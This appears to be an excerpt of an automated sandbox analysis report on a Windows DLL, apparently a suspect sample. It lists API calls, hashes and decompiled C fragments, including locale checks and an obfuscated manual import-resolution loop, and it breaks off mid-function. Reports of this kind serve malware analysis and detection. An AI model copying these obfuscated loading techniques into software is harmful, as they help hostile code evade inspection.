              0x6e1c1ea7
              0x6e1c1ea9
              0x6e1c1ebc
              0x6e1c1ebc
              0x6e1c1ec6

              APIs
              • GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,6E1C1B27,?,6E1C1CE6,?,00000000,00000000,?,?,?,6E1C1CE6), ref: 6E1C1E9F
              • GetSystemDefaultUILanguage.KERNEL32(?,?,6E1C1B27,?,6E1C1CE6,?,00000000,00000000,?,?,?,6E1C1CE6), ref: 6E1C1EA9
              • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E1C1B27,?,6E1C1CE6,?,00000000,00000000,?,?,?,6E1C1CE6), ref: 6E1C1EBC
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Language$DefaultInfoLocaleNameSystem
              • String ID:
              • API String ID: 3724080410-0
              • Opcode ID: bfe6726ae040d01ddf4c0565af9bc4ecad39fbc3282865721a254cb0eae93362
              • Instruction ID: a1ef0b69b5290e8a8571ae763b75fba86f64ce0cb440108822c11f2e57b5a6be
              • Opcode Fuzzy Hash: bfe6726ae040d01ddf4c0565af9bc4ecad39fbc3282865721a254cb0eae93362
              • Instruction Fuzzy Hash: ECE04874640204F6E700E7918C0AFBD76BCA711F0AF504084F701D60C0D7789A49B765
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C1F7C(void* __edi, intOrPtr _a4) {
              				signed int _v8;
              				intOrPtr* _v12;
              				_Unknown_base(*)()** _v16;
              				signed int _v20;
              				signed short _v24;
              				struct HINSTANCE__* _v28;
              				intOrPtr _t43;
              				intOrPtr* _t45;
              				intOrPtr _t46;
              				struct HINSTANCE__* _t47;
              				intOrPtr* _t49;
              				intOrPtr _t50;
              				signed short _t51;
              				_Unknown_base(*)()* _t53;
              				CHAR* _t54;
              				_Unknown_base(*)()* _t55;
              				void* _t58;
              				signed int _t59;
              				_Unknown_base(*)()* _t60;
              				intOrPtr _t61;
              				intOrPtr _t65;
              				signed int _t68;
              				void* _t69;
              				CHAR* _t71;
              				signed short* _t73;
              
              				_t69 = __edi;
              				_v20 = _v20 & 0x00000000;
              				_t59 =  *0x6e1c41cc;
              				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
              				if(_t43 != 0) {
              					_t45 = _t43 + __edi;
              					_v12 = _t45;
              					_t46 =  *((intOrPtr*)(_t45 + 0xc));
              					if(_t46 != 0) {
              						while(1) {
              							_t71 = _t46 + _t69;
              							_t47 = LoadLibraryA(_t71);
              							_v28 = _t47;
              							if(_t47 == 0) {
              								break;
              							}
              							_v24 = _v24 & 0x00000000;
              							 *_t71 = _t59 - 0x63699bc3;
              							_t49 = _v12;
              							_t61 =  *((intOrPtr*)(_t49 + 0x10));
              							_t50 =  *_t49;
              							if(_t50 != 0) {
              								L6:
              								_t73 = _t50 + _t69;
              								_v16 = _t61 + _t69;
              								while(1) {
              									_t51 =  *_t73;
              									if(_t51 == 0) {
              										break;
              									}
              									if(__eflags < 0) {
              										__eflags = _t51 - _t69;
              										if(_t51 < _t69) {
              											L12:
              											_t21 =  &_v8;
              											 *_t21 = _v8 & 0x00000000;
              											__eflags =  *_t21;
              											_v24 =  *_t73 & 0x0000ffff;
              										} else {
              											_t65 = _a4;
              											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
              											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
              												goto L12;
              											} else {
              												goto L11;
              											}
              										}
              									} else {
              										_t51 = _t51 + _t69;
              										L11:
              										_v8 = _t51;
              									}
              									_t53 = _v8;
              									__eflags = _t53;
              									if(_t53 == 0) {
              										_t54 = _v24 & 0x0000ffff;
              									} else {
              										_t54 = _t53 + 2;
              									}
              									_t55 = GetProcAddress(_v28, _t54);
              									__eflags = _t55;
              									if(__eflags == 0) {
              										_v20 = _t59 - 0x63699b44;
              									} else {
              										_t68 = _v8;
              										__eflags = _t68;
              										if(_t68 != 0) {
              											 *_t68 = _t59 - 0x63699bc3;
              										}
              										 *_v16 = _t55;
              										_t58 = 0x725990f8 + _t59 * 4;
              										_t73 = _t73 + _t58;
              										_t32 =  &_v16;
              										 *_t32 = _v16 + _t58;
              										__eflags =  *_t32;
              										continue;
              									}
              									goto L23;
              								}
              							} else {
              								_t50 = _t61;
              								if(_t61 != 0) {
              									goto L6;
              								}
              							}
              							L23:
              							_v12 = _v12 + 0x14;
              							_t46 =  *((intOrPtr*)(_v12 + 0xc));
              							if(_t46 != 0) {
              								continue;
              							} else {
              							}
              							L26:
              							goto L27;
              						}
              						_t60 = _t59 + 0x9c9664bb;
              						__eflags = _t60;
              						_v20 = _t60;
              						goto L26;
              					}
              				}
              				L27:
              				return _v20;
              			}




























              0x6e1c1f7c
              0x6e1c1f85
              0x6e1c1f8a
              0x6e1c1f90
              0x6e1c1f99
              0x6e1c1f9f
              0x6e1c1fa1
              0x6e1c1fa4
              0x6e1c1fa9
              0x6e1c1fb0
              0x6e1c1fb0
              0x6e1c1fb4
              0x6e1c1fbc
              0x6e1c1fbf
              0x00000000
              0x00000000
              0x6e1c1fc5
              0x6e1c1fcf
              0x6e1c1fd1
              0x6e1c1fd4
              0x6e1c1fd7
              0x6e1c1fdb
              0x6e1c1fe3
              0x6e1c1fe5
              0x6e1c1fe8
              0x6e1c2050
              0x6e1c2050
              0x6e1c2054
              0x00000000
              0x00000000
              0x6e1c1fed
              0x6e1c1ff3
              0x6e1c1ff5
              0x6e1c2008
              0x6e1c200b
              0x6e1c200b
              0x6e1c200b
              0x6e1c200f
              0x6e1c1ff7
              0x6e1c1ff7
              0x6e1c1fff
              0x6e1c2001
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6e1c2001
              0x6e1c1fef
              0x6e1c1fef
              0x6e1c2003
              0x6e1c2003
              0x6e1c2003
              0x6e1c2012
              0x6e1c2015
              0x6e1c2017
              0x6e1c201e
              0x6e1c2019
              0x6e1c2019
              0x6e1c2019
              0x6e1c2026
              0x6e1c202c
              0x6e1c202e
              0x6e1c205e
              0x6e1c2030
              0x6e1c2030
              0x6e1c2033
              0x6e1c2035
              0x6e1c203d
              0x6e1c203d
              0x6e1c2042
              0x6e1c2044
              0x6e1c204b
              0x6e1c204d
              0x6e1c204d
              0x6e1c204d
              0x00000000
              0x6e1c204d
              0x00000000
              0x6e1c202e
              0x6e1c1fdd
              0x6e1c1fdf
              0x6e1c1fe1
              0x00000000
              0x00000000
              0x6e1c1fe1
              0x6e1c2061
              0x6e1c2061
              0x6e1c2068
              0x6e1c206d
              0x00000000
              0x00000000
              0x6e1c2073
              0x6e1c207e
              0x00000000
              0x6e1c207e
              0x6e1c2075
              0x6e1c2075
              0x6e1c207b
              0x00000000
              0x6e1c207b
              0x6e1c1fa9
              0x6e1c207f
              0x6e1c2084

              APIs
              • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6E1C1FB4
              • GetProcAddress.KERNEL32(?,00000000), ref: 6E1C2026
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID:
              • API String ID: 2574300362-0
              • Opcode ID: c748fc5e8b8994ffc6bb63df03aa65b9411437cb7578e2276a3303b1141ca453
              • Instruction ID: f992cfdbcde13cd31fb28b6e3f1b0a89e489c140df5a262a14a975afbff3f888
              • Opcode Fuzzy Hash: c748fc5e8b8994ffc6bb63df03aa65b9411437cb7578e2276a3303b1141ca453
              • Instruction Fuzzy Hash: AA316B71A00606DFDB40CF99C894AAEB7F4FF29B00B20406ED815E7344E778DA95EB52
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6E21DE7B,?,?,?,00000001), ref: 6E225ED7
              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 6E225EE0
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 0a64ca376d2289adb0fc86531030cac370ce7df85bdf6a34aa8bc7017b01ef54
              • Instruction ID: b4e9e01e183c2e2d80f675104cff8235a2f90f47ed9c16f6315829cc9577a6e1
              • Opcode Fuzzy Hash: 0a64ca376d2289adb0fc86531030cac370ce7df85bdf6a34aa8bc7017b01ef54
              • Instruction Fuzzy Hash: 48B09271244608ABDE002B9DD90EB8C3F6AEB06A62F044010F60D880508B725451CAA1
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID:
              • String ID: @$^0
              • API String ID: 0-2280991083
              • Opcode ID: 0c69ca46b49daba09c74fb2618b2adb89fafeadf74ac7722f99a23064b1f137e
              • Instruction ID: ee2cc6879270804a9077a07fd7523ba3f52f1e9f83bb6287f500aa8599bd2cc2
              • Opcode Fuzzy Hash: 0c69ca46b49daba09c74fb2618b2adb89fafeadf74ac7722f99a23064b1f137e
              • Instruction Fuzzy Hash: 7FF143B0B868518FCB08CFBFC498B197BA3FB8630AB48A239D96597359C7345444DB74
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C2485(long _a4) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				signed int _v16;
              				short* _v32;
              				void _v36;
              				void* _t57;
              				signed int _t58;
              				signed int _t61;
              				signed int _t62;
              				void* _t63;
              				signed int* _t68;
              				intOrPtr* _t69;
              				intOrPtr* _t71;
              				intOrPtr _t72;
              				intOrPtr _t75;
              				void* _t76;
              				signed int _t77;
              				void* _t78;
              				void _t80;
              				signed int _t81;
              				signed int _t84;
              				signed int _t86;
              				short* _t87;
              				void* _t89;
              				signed int* _t90;
              				long _t91;
              				signed int _t93;
              				signed int _t94;
              				signed int _t100;
              				signed int _t102;
              				void* _t104;
              				long _t108;
              				signed int _t110;
              
              				_t108 = _a4;
              				_t76 =  *(_t108 + 8);
              				if((_t76 & 0x00000003) != 0) {
              					L3:
              					return 0;
              				}
              				_a4 =  *[fs:0x4];
              				_v8 =  *[fs:0x8];
              				if(_t76 < _v8 || _t76 >= _a4) {
              					_t102 =  *(_t108 + 0xc);
              					__eflags = _t102 - 0xffffffff;
              					if(_t102 != 0xffffffff) {
              						_t91 = 0;
              						__eflags = 0;
              						_a4 = 0;
              						_t57 = _t76;
              						do {
              							_t80 =  *_t57;
              							__eflags = _t80 - 0xffffffff;
              							if(_t80 == 0xffffffff) {
              								goto L9;
              							}
              							__eflags = _t80 - _t91;
              							if(_t80 >= _t91) {
              								L20:
              								_t63 = 0;
              								L60:
              								return _t63;
              							}
              							L9:
              							__eflags =  *(_t57 + 4);
              							if( *(_t57 + 4) != 0) {
              								_t12 =  &_a4;
              								 *_t12 = _a4 + 1;
              								__eflags =  *_t12;
              							}
              							_t91 = _t91 + 1;
              							_t57 = _t57 + 0xc;
              							__eflags = _t91 - _t102;
              						} while (_t91 <= _t102);
              						__eflags = _a4;
              						if(_a4 == 0) {
              							L15:
              							_t81 =  *0x6e1c41f8;
              							_t110 = _t76 & 0xfffff000;
              							_t58 = 0;
              							__eflags = _t81;
              							if(_t81 <= 0) {
              								L18:
              								_t104 = _t102 | 0xffffffff;
              								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
              								__eflags = _t61;
              								if(_t61 < 0) {
              									_t62 = 0;
              									__eflags = 0;
              								} else {
              									_t62 = _a4;
              								}
              								__eflags = _t62;
              								if(_t62 == 0) {
              									L59:
              									_t63 = _t104;
              									goto L60;
              								} else {
              									__eflags = _v12 - 0x1000000;
              									if(_v12 != 0x1000000) {
              										goto L59;
              									}
              									__eflags = _v16 & 0x000000cc;
              									if((_v16 & 0x000000cc) == 0) {
              										L46:
              										_t63 = 1;
              										 *0x6e1c4240 = 1;
              										__eflags =  *0x6e1c4240;
              										if( *0x6e1c4240 != 0) {
              											goto L60;
              										}
              										_t84 =  *0x6e1c41f8;
              										__eflags = _t84;
              										_t93 = _t84;
              										if(_t84 <= 0) {
              											L51:
              											__eflags = _t93;
              											if(_t93 != 0) {
              												L58:
              												 *0x6e1c4240 = 0;
              												goto L5;
              											}
              											_t77 = 0xf;
              											__eflags = _t84 - _t77;
              											if(_t84 <= _t77) {
              												_t77 = _t84;
              											}
              											_t94 = 0;
              											__eflags = _t77;
              											if(_t77 < 0) {
              												L56:
              												__eflags = _t84 - 0x10;
              												if(_t84 < 0x10) {
              													_t86 = _t84 + 1;
              													__eflags = _t86;
              													 *0x6e1c41f8 = _t86;
              												}
              												goto L58;
              											} else {
              												do {
              													_t68 = 0x6e1c4200 + _t94 * 4;
              													_t94 = _t94 + 1;
              													__eflags = _t94 - _t77;
              													 *_t68 = _t110;
              													_t110 =  *_t68;
              												} while (_t94 <= _t77);
              												goto L56;
              											}
              										}
              										_t69 = 0x6e1c41fc + _t84 * 4;
              										while(1) {
              											__eflags =  *_t69 - _t110;
              											if( *_t69 == _t110) {
              												goto L51;
              											}
              											_t93 = _t93 - 1;
              											_t69 = _t69 - 4;
              											__eflags = _t93;
              											if(_t93 > 0) {
              												continue;
              											}
              											goto L51;
              										}
              										goto L51;
              									}
              									_t87 = _v32;
              									__eflags =  *_t87 - 0x5a4d;
              									if( *_t87 != 0x5a4d) {
              										goto L59;
              									}
              									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
              									__eflags =  *_t71 - 0x4550;
              									if( *_t71 != 0x4550) {
              										goto L59;
              									}
              									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
              									if( *((short*)(_t71 + 0x18)) != 0x10b) {
              										goto L59;
              									}
              									_t78 = _t76 - _t87;
              									__eflags =  *((short*)(_t71 + 6));
              									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
              									if( *((short*)(_t71 + 6)) <= 0) {
              										goto L59;
              									}
              									_t72 =  *((intOrPtr*)(_t89 + 0xc));
              									__eflags = _t78 - _t72;
              									if(_t78 < _t72) {
              										goto L46;
              									}
              									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
              									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
              										goto L46;
              									}
              									__eflags =  *(_t89 + 0x27) & 0x00000080;
              									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
              										goto L20;
              									}
              									goto L46;
              								}
              							} else {
              								goto L16;
              							}
              							while(1) {
              								L16:
              								__eflags =  *((intOrPtr*)(0x6e1c4200 + _t58 * 4)) - _t110;
              								if( *((intOrPtr*)(0x6e1c4200 + _t58 * 4)) == _t110) {
              									break;
              								}
              								_t58 = _t58 + 1;
              								__eflags = _t58 - _t81;
              								if(_t58 < _t81) {
              									continue;
              								}
              								goto L18;
              							}
              							__eflags = _t58;
              							if(_t58 <= 0) {
              								goto L5;
              							}
              							 *0x6e1c4240 = 1;
              							__eflags =  *0x6e1c4240;
              							if( *0x6e1c4240 != 0) {
              								goto L5;
              							}
              							__eflags =  *((intOrPtr*)(0x6e1c4200 + _t58 * 4)) - _t110;
              							if( *((intOrPtr*)(0x6e1c4200 + _t58 * 4)) == _t110) {
              								L32:
              								_t100 = 0;
              								__eflags = _t58;
              								if(_t58 < 0) {
              									L34:
              									 *0x6e1c4240 = 0;
              									goto L5;
              								} else {
              									goto L33;
              								}
              								do {
              									L33:
              									_t90 = 0x6e1c4200 + _t100 * 4;
              									_t100 = _t100 + 1;
              									__eflags = _t100 - _t58;
              									 *_t90 = _t110;
              									_t110 =  *_t90;
              								} while (_t100 <= _t58);
              								goto L34;
              							}
              							_t58 = _t81 - 1;
              							__eflags = _t58;
              							if(_t58 < 0) {
              								L28:
              								__eflags = _t81 - 0x10;
              								if(_t81 < 0x10) {
              									_t81 = _t81 + 1;
              									__eflags = _t81;
              									 *0x6e1c41f8 = _t81;
              								}
              								_t58 = _t81 - 1;
              								goto L32;
              							} else {
              								goto L25;
              							}
              							while(1) {
              								L25:
              								__eflags =  *((intOrPtr*)(0x6e1c4200 + _t58 * 4)) - _t110;
              								if( *((intOrPtr*)(0x6e1c4200 + _t58 * 4)) == _t110) {
              									break;
              								}
              								_t58 = _t58 - 1;
              								__eflags = _t58;
              								if(_t58 >= 0) {
              									continue;
              								}
              								break;
              							}
              							__eflags = _t58;
              							if(__eflags >= 0) {
              								if(__eflags == 0) {
              									goto L34;
              								}
              								goto L32;
              							}
              							goto L28;
              						}
              						_t75 =  *((intOrPtr*)(_t108 - 8));
              						__eflags = _t75 - _v8;
              						if(_t75 < _v8) {
              							goto L20;
              						}
              						__eflags = _t75 - _t108;
              						if(_t75 >= _t108) {
              							goto L20;
              						}
              						goto L15;
              					}
              					L5:
              					_t63 = 1;
              					goto L60;
              				} else {
              					goto L3;
              				}
              			}




































              0x6e1c248f
              0x6e1c2492
              0x6e1c2498
              0x6e1c24b6
              0x00000000
              0x6e1c24b6
              0x6e1c24a0
              0x6e1c24a9
              0x6e1c24af
              0x6e1c24be
              0x6e1c24c1
              0x6e1c24c4
              0x6e1c24ce
              0x6e1c24ce
              0x6e1c24d0
              0x6e1c24d3
              0x6e1c24d5
              0x6e1c24d5
              0x6e1c24d7
              0x6e1c24da
              0x00000000
              0x00000000
              0x6e1c24dc
              0x6e1c24de
              0x6e1c2544
              0x6e1c2544
              0x6e1c26a2
              0x00000000
              0x6e1c26a2
              0x6e1c24e0
              0x6e1c24e0
              0x6e1c24e4
              0x6e1c24e6
              0x6e1c24e6
              0x6e1c24e6
              0x6e1c24e6
              0x6e1c24e9
              0x6e1c24ea
              0x6e1c24ed
              0x6e1c24ed
              0x6e1c24f1
              0x6e1c24f5
              0x6e1c2503
              0x6e1c2503
              0x6e1c250b
              0x6e1c2511
              0x6e1c2513
              0x6e1c2515
              0x6e1c2525
              0x6e1c2532
              0x6e1c2536
              0x6e1c253b
              0x6e1c253d
              0x6e1c25bb
              0x6e1c25bb
              0x6e1c253f
              0x6e1c253f
              0x6e1c253f
              0x6e1c25bd
              0x6e1c25bf
              0x6e1c26a0
              0x6e1c26a0
              0x00000000
              0x6e1c25c5
              0x6e1c25c5
              0x6e1c25cc
              0x00000000
              0x00000000
              0x6e1c25d2
              0x6e1c25d6
              0x6e1c2632
              0x6e1c2634
              0x6e1c263c
              0x6e1c263e
              0x6e1c2640
              0x00000000
              0x00000000
              0x6e1c2642
              0x6e1c2648
              0x6e1c264a
              0x6e1c264c
              0x6e1c2661
              0x6e1c2661
              0x6e1c2663
              0x6e1c2692
              0x6e1c2699
              0x00000000
              0x6e1c2699
              0x6e1c2667
              0x6e1c2668
              0x6e1c266a
              0x6e1c266c
              0x6e1c266c
              0x6e1c266e
              0x6e1c2670
              0x6e1c2672
              0x6e1c2686
              0x6e1c2686
              0x6e1c2689
              0x6e1c268b
              0x6e1c268b
              0x6e1c268c
              0x6e1c268c
              0x00000000
              0x6e1c2674
              0x6e1c2674
              0x6e1c2674
              0x6e1c267d
              0x6e1c267e
              0x6e1c2680
              0x6e1c2682
              0x6e1c2682
              0x00000000
              0x6e1c2674
              0x6e1c2672
              0x6e1c264e
              0x6e1c2655
              0x6e1c2655
              0x6e1c2657
              0x00000000
              0x00000000
              0x6e1c2659
              0x6e1c265a
              0x6e1c265d
              0x6e1c265f
              0x00000000
              0x00000000
              0x00000000
              0x6e1c265f
              0x00000000
              0x6e1c2655
              0x6e1c25d8
              0x6e1c25db
              0x6e1c25e0
              0x00000000
              0x00000000
              0x6e1c25e9
              0x6e1c25eb
              0x6e1c25f1
              0x00000000
              0x00000000
              0x6e1c25f7
              0x6e1c25fd
              0x00000000
              0x00000000
              0x6e1c2603
              0x6e1c2605
              0x6e1c260e
              0x6e1c2612
              0x00000000
              0x00000000
              0x6e1c2618
              0x6e1c261b
              0x6e1c261d
              0x00000000
              0x00000000
              0x6e1c2624
              0x6e1c2626
              0x00000000
              0x00000000
              0x6e1c2628
              0x6e1c262c
              0x00000000
              0x00000000
              0x00000000
              0x6e1c262c
              0x00000000
              0x00000000
              0x00000000
              0x6e1c2517
              0x6e1c2517
              0x6e1c2517
              0x6e1c251e
              0x00000000
              0x00000000
              0x6e1c2520
              0x6e1c2521
              0x6e1c2523
              0x00000000
              0x00000000
              0x00000000
              0x6e1c2523
              0x6e1c254b
              0x6e1c254d
              0x00000000
              0x00000000
              0x6e1c255d
              0x6e1c255f
              0x6e1c2561
              0x00000000
              0x00000000
              0x6e1c2567
              0x6e1c256e
              0x6e1c259a
              0x6e1c259a
              0x6e1c259c
              0x6e1c259e
              0x6e1c25b2
              0x6e1c25b4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6e1c25a0
              0x6e1c25a0
              0x6e1c25a0
              0x6e1c25a9
              0x6e1c25aa
              0x6e1c25ac
              0x6e1c25ae
              0x6e1c25ae
              0x00000000
              0x6e1c25a0
              0x6e1c2570
              0x6e1c2573
              0x6e1c2575
              0x6e1c2587
              0x6e1c2587
              0x6e1c258a
              0x6e1c258c
              0x6e1c258c
              0x6e1c258d
              0x6e1c258d
              0x6e1c2593
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6e1c2577
              0x6e1c2577
              0x6e1c2577
              0x6e1c257e
              0x00000000
              0x00000000
              0x6e1c2580
              0x6e1c2580
              0x6e1c2581
              0x00000000
              0x00000000
              0x00000000
              0x6e1c2581
              0x6e1c2583
              0x6e1c2585
              0x6e1c2598
              0x00000000
              0x00000000
              0x00000000
              0x6e1c2598
              0x00000000
              0x6e1c2585
              0x6e1c24f7
              0x6e1c24fa
              0x6e1c24fd
              0x00000000
              0x00000000
              0x6e1c24ff
              0x6e1c2501
              0x00000000
              0x00000000
              0x00000000
              0x6e1c2501
              0x6e1c24c6
              0x6e1c24c8
              0x00000000
              0x00000000
              0x00000000
              0x00000000

              APIs
              • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E1C2536
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MemoryQueryVirtual
              • String ID:
              • API String ID: 2850889275-0
              • Opcode ID: 5e3161217170060b4ce1e2be50cd83092e441f3a7d83a638fabe97ae9ce25563
              • Instruction ID: 7235fcdb4bba89b8badda73c18b7b20f7ea6bfc0909e86272b3c71de65423a49
              • Opcode Fuzzy Hash: 5e3161217170060b4ce1e2be50cd83092e441f3a7d83a638fabe97ae9ce25563
              • Instruction Fuzzy Hash: C5610670714E12CFE745CFA9D4A079A73B1ABB5F14B30A428D865C7284E73CD8C2E662
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • EnumSystemLocalesW.KERNEL32(6E22ECFF,00000001,?,6E22DC71,6E22DD0F,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6E22ED41
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: EnumLocalesSystem
              • String ID:
              • API String ID: 2099609381-0
              • Opcode ID: d2bce1483d9ed703b2eb6e88aacf787b7a858aef29b836c802b43c068c73e4d9
              • Instruction ID: a48133068195d99a27a6ac8a86a6d4250542ee6598144fba816962ccbbab43dd
              • Opcode Fuzzy Hash: d2bce1483d9ed703b2eb6e88aacf787b7a858aef29b836c802b43c068c73e4d9
              • Instruction Fuzzy Hash: 78E0927229064CAFDF019FAADC4AB6D3BA6BB09711F009411F61C4A150C6B1A960EF64
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,6E223D76,?,?,?,00000002,?,00000000,00000000), ref: 6E22EDC0
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: InfoLocale
              • String ID:
              • API String ID: 2299586839-0
              • Opcode ID: 6d0845e281bed74c1cf47075afa685b275dc75d706512c1578865d59e1cbe361
              • Instruction ID: ec615d8938a14c894d2c125b96b20b773e59bc9cd0696c724c34a36dd99893a2
              • Opcode Fuzzy Hash: 6d0845e281bed74c1cf47075afa685b275dc75d706512c1578865d59e1cbe361
              • Instruction Fuzzy Hash: A5D0173600410DBF9F029FE4EC098AE3BAAFB49224B000810F91845010D632A460EB60
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 6E225EA7
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 06299542c29e121a760e0d88010e323fc62024f557ba27dc40b6f6271d670955
              • Instruction ID: 7e600832d0f0c51b65722c059d5b8189a9339ac77f7b899ebd07a7cbf992b62c
              • Opcode Fuzzy Hash: 06299542c29e121a760e0d88010e323fc62024f557ba27dc40b6f6271d670955
              • Instruction Fuzzy Hash: B0A0243000010CF7CF001F4DDC0D44C7F1DD7035507004010F40C04011C7335411C5D0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetProcessHeap.KERNEL32(6E21C958,6E293798,00000008,6E294008,6E29354C,?,00000001), ref: 6E225139
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: HeapProcess
              • String ID:
              • API String ID: 54951025-0
              • Opcode ID: af4c230d978515669ec482fbe099bf311523377186a6ee401d6dac2e9fd6c0da
              • Instruction ID: 1630e05ac401ca38046f3abd821baef4388a481d0b25e60aaa6a9208016b6576
              • Opcode Fuzzy Hash: af4c230d978515669ec482fbe099bf311523377186a6ee401d6dac2e9fd6c0da
              • Instruction Fuzzy Hash: 5CB012B0307D02477F080B3D545D00D35D5770D202314003D7003C5140EF20C450DE24
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
              • Instruction ID: 8c7fa241a88ef3beb5953e970c7dc3d599bf3b26f48804e8d4671339ece989ae
              • Opcode Fuzzy Hash: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
              • Instruction Fuzzy Hash: 16615FB1E0062A8BDB19CF5EC890159FBF6BFC5300729C16AD859DB715E670D942CF90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 71%
              			E6E1C2264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
              				intOrPtr _v8;
              				char _v12;
              				void* __ebp;
              				signed int* _t43;
              				char _t44;
              				void* _t46;
              				void* _t49;
              				intOrPtr* _t53;
              				void* _t54;
              				void* _t65;
              				long _t66;
              				signed int* _t80;
              				signed int* _t82;
              				void* _t84;
              				signed int _t86;
              				void* _t89;
              				void* _t95;
              				void* _t96;
              				void* _t99;
              				void* _t106;
              
              				_t43 = _t84;
              				_t65 = __ebx + 2;
              				 *_t43 =  *_t43 ^ __edx ^  *__eax;
              				_t89 = _t95;
              				_t96 = _t95 - 8;
              				_push(_t65);
              				_push(_t84);
              				_push(_t89);
              				asm("cld");
              				_t66 = _a8;
              				_t44 = _a4;
              				if(( *(_t44 + 4) & 0x00000006) != 0) {
              					_push(_t89);
              					E6E1C23CB(_t66 + 0x10, _t66, 0xffffffff);
              					_t46 = 1;
              				} else {
              					_v12 = _t44;
              					_v8 = _a12;
              					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
              					_t86 =  *(_t66 + 0xc);
              					_t80 =  *(_t66 + 8);
              					_t49 = E6E1C2485(_t66);
              					_t99 = _t96 + 4;
              					if(_t49 == 0) {
              						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
              						goto L11;
              					} else {
              						while(_t86 != 0xffffffff) {
              							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
              							if(_t53 == 0) {
              								L8:
              								_t80 =  *(_t66 + 8);
              								_t86 = _t80[_t86 + _t86 * 2];
              								continue;
              							} else {
              								_t54 =  *_t53();
